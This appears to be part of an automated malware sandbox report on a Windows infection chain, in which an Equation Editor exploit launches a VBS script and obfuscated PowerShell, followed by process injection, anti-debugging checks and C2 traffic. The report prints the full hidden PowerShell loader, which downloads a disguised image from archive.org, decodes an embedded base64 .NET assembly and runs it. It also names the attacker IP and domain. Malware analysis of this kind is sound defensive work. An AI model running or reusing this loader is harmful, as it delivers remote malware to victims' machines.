            Source: C:\Users\user\AppData\Roaming\gwseuhaThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
            Source: explorer.exe, 0000000C.00000002.630243639.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
            Source: explorer.exe, 0000000C.00000002.630243639.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
            Source: explorer.exe, 0000000C.00000002.630243639.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
            Source: explorer.exe, 0000000C.00000002.629766627.00000000025E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
            Source: explorer.exe, 0000000C.00000002.630243639.0000000003E59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | System information queried: CodeIntegrityInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_00081E4C CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,22_2_00081E4C
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,22_2_000816C7
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_00129247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,19_2_00129247
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C1000 GetProcessHeap,RtlAllocateHeap,19_2_000C1000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\gwseuha | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\explorer.exe | File created: gwseuha.12.dr
            Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 185.251.91.119 80
            Source: C:\Windows\explorer.exe | Domain query: prolinice.ga
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread created: C:\Windows\explorer.exe EIP: 2801960
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\explorer.exe | Memory written: PID: 4056 base: 9F102D value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 4080 base: FF31B794 value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 2480 base: 9F102D value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 1872 base: 9F102D value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 2772 base: FF31B794 value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 2840 base: 9F102D value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 2836 base: FF31B794 value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 2704 base: 9F102D value: 90
            Source: C:\Windows\explorer.exe | Memory written: PID: 2460 base: FF31B794 value: 90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008
            Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9F102D
            Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9F102D
            Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9F102D
            Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9F102D
            Source: C:\Windows\explorer.exe | Memory written: C:\Windows\SysWOW64\explorer.exe base: 9F102D
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe 26_2_00081016
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpi,lstrcmpi,Process32Next,CloseHandle,Sleep, explorer.exe 26_2_000810A5
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\System32\taskeng.exe | Process created: C:\Users\user\AppData\Roaming\gwseuha C:\Users\user\AppData\Roaming\gwseuha
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?e
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.vfew/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
